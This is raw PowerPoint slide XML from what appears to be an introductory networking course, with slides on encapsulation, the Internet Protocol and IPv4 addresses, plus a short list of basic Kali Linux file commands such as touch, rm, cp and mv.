              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="864234" h="772795">
                  <a:moveTo>
                    <a:pt x="0" y="128778"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10120" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719" y="37719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735330" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="643890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="734949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330" y="772668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128777" y="772668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719" y="734949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10120" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="643890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12877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46" name="object 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{666080B1-6AB7-FC25-9368-A3425EF3AF9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6445192" y="4073095"/>
            <a:ext cx="554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7" name="object 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B3761B-4414-3F80-2D48-11A4E37D9EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994213" y="3828087"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="3897630"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30831B64-A4A0-CA8D-33BF-9767FE546F01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973061" y="3897630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927100" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="1014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3" name="object 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437A4230-B40C-0CF6-1FE7-5CD3FD4C534C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973061" y="3897630"/>
              <a:ext cx="1056640" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640" h="774700">
                  <a:moveTo>
                    <a:pt x="0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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48" name="object 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA5833F-52A0-D6CF-6617-2478BE545810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136454" y="4073704"/>
            <a:ext cx="59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88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761522E8-242A-8624-C0B2-4AA0A500ED6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131505" y="4766534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50" name="object 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D8EAA8-BAFB-BC13-C2E1-603685DE0B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131505" y="4777180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49</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A12561CE-40EA-E866-FC12-490BB6935E24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449517" y="1262814"/>
            <a:ext cx="229806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514984" marR="5080" indent="-515620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="514984" algn="l"/>
              </a:tabLst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252525"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Encapsulation headers</a:t>
            </a:r>
            <a:endParaRPr sz="240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A9571C-A4B1-AE49-13E0-AA79DF02DC91}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="324000" y="1676520"/>
              <a:ext cx="5781960" cy="277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A9571C-A4B1-AE49-13E0-AA79DF02DC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640" y="1667160"/>
                <a:ext cx="5800680" cy="27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42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32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26FCD5C9-7890-FB3A-49CB-969FCA80F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6" y="114045"/>
            <a:ext cx="7936052" cy="818515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657D54C3-3F0F-7605-B35E-98D01245B9FA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id="{46D558BB-725C-C09C-AC4A-386112D55AC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54" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BD556CD-B6EA-6E24-6910-80F467D2045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5</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D025C3E-E4EA-C102-E002-065479D51FDA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56" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3E65C0-2556-BD8F-755E-9AAF3DB2A4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57" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581E7AFA-6174-C66D-E4EA-479BBBB24E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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58" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E39989-AB37-2948-468A-E46EB19D4B7F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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653B188A-078B-D356-ED10-84B6EC332152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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E983D3-9933-29A1-86AA-A25AAE68795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61" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4D633C-00E7-C0C0-9D9B-D2314F689449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62" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3F3C98-489B-3F12-1001-A901A123D6E5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63" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B740D753-D5E2-E9CB-FA0B-C87DDB10F3EA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5</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748B737F-C989-C0F3-F5FD-B06F77E71CB1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1.2 All Kali Linux commands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65" name="Text Box 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6776D943-B3E6-81D8-9EAF-29319DB9F439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="1706880"/>
            <a:ext cx="2515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 -touch new file       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A5768B9-A758-F966-625E-0C9E4971F7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="219075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7" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4836AAE-9230-77A1-5646-AA87E9982526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1951990"/>
            <a:ext cx="2160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new file  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text Box 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF01E72D-FFBC-F154-F909-EA7A925E1E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="233045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-rm name file     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E0B5C9B-0A7D-E093-9FB4-CDFF7E3420A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2105660" y="257175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0" name="Text Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D9A476-8231-A4DF-E7F6-C3C3969471D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2419350"/>
            <a:ext cx="3067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remove the file </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F7B0390-B70B-04FF-6A04-1401616B68CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2724150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rm –r name folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    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6DFFCA2-E3B8-8D8F-8E43-2081DFFAE466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729230" y="2945001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3" name="Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32BCCD4A-044E-E47A-06F5-7C54F883E1D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439285" y="2787650"/>
            <a:ext cx="3113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the folder </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCCC74EA-F49D-9487-2118-22CEA9DD70A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323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cp topic name file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8EF830-21BB-2825-14FE-8A7B3D36FC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379302" y="3208067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Copy the file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    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46373B6-5488-7545-B4A4-B6BA26FAD478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867538" y="336444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8836C45-B082-4C45-D903-C402250FA68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2873888" y="3797935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9" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718C9070-5D98-E229-39AF-54276D2C8E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453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mv topic name file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F99DF39-B58D-0B6F-AFD5-5C0CCE52BEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4245781" y="3573896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Move the file   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329169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EE3BA11-EE17-0D21-8F32-E3DA68C524F0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38E82B0-C05C-182C-A576-B923BDC0F422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5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Encapsulation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426A82C-4863-E63D-43CE-9CEAD40A5DCC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BD22F833-1C72-F67C-4692-278CF94835BA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50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ACECD33-434A-E009-3F21-AD72BDEBC185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="7851775" cy="273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receiving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host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does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same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operation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reverse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order.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Using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this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method,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application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does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need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to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worry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about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transport,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link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layers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work.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just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hands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transport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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5638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encapsulation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practice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later,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during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Wireshark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section.</a:t>
            </a:r>
            <a:endParaRPr sz="24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84887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449D32-E22A-87FA-7A88-25714D1956FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6941566" y="185828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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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AB5FE38-D8FE-DCB5-463E-FAF89DC34135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727451" y="4766051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94FC60B-2D1C-558B-848F-7D22F846E4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3727451" y="4776697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51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A83D645-B91A-4A2A-FDA3-309134F9FF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519809" y="1597356"/>
            <a:ext cx="52495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Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-10" dirty="0"/>
              <a:t>Protocol</a:t>
            </a:r>
            <a:endParaRPr sz="5400"/>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400" spc="-20" dirty="0"/>
              <a:t>(IP)</a:t>
            </a:r>
            <a:endParaRPr sz="5400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32980725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51297BD-2FA7-EEE2-2561-C1A45BC41070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33EB76D-0763-9821-AE6E-0D4C80DC0D25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6 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP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F7340D7-DABB-9242-D538-7154B6B5E77E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8DFA992-8596-E6D3-C224-0F98BF4B9FB1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52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43D0906-97C1-A081-7013-4A1A70C73D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="8043545" cy="273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1879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Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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(IP)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runs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Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Internet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suite,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also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known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as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TCP/IP.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 dirty="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IP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charge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delivering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datagrams</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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(IP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packets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are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called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datagrams)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hosts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involved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a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communication,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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uses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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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identify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host.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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0F5EBF-962D-1EDB-D883-1AFB2419DB10}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="399960" y="1728720"/>
              <a:ext cx="7491960" cy="253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0F5EBF-962D-1EDB-D883-1AFB2419DB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600" y="1719360"/>
                <a:ext cx="7510680" cy="255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7974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018C886-D9AD-4A44-0B42-707D79AFE33E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433D61C-3C2E-8770-9C06-BF31A2F5C271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6 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IPv4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Addresses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4D1FDC8-D4CF-3A33-30D3-A648A67E53E9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455E585-A363-A8A0-8EBE-A26EB3C90AE8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53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F8B266A-C41F-142D-FCDD-ADE2DC32B156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="7903845" cy="273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7556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When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write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letter,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have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specify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recipient's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address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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envelope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before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sending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it.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Similarly,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Internet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addressing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scheme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deliver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to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right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destination.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 dirty="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Any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host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computer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network,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private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or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Internet,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identified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unique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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address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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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CE6F83-2DF0-5F18-8ED7-15258188D6E2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4405320" y="3438360"/>
              <a:ext cx="3572280" cy="76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CE6F83-2DF0-5F18-8ED7-15258188D6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5960" y="3429000"/>
                <a:ext cx="3591000" cy="78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265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7E63DA-E816-80C9-A4A2-7C8AA0F0DB86}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="528480" y="447840"/>
              <a:ext cx="8039520" cy="379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7E63DA-E816-80C9-A4A2-7C8AA0F0DB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120" y="438480"/>
                <a:ext cx="8058240" cy="38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1953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0130F77D-20D8-48F4-5C90-664282B3F13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498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567D0E25-D5AF-6FEE-F4E1-A98B54DA6087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
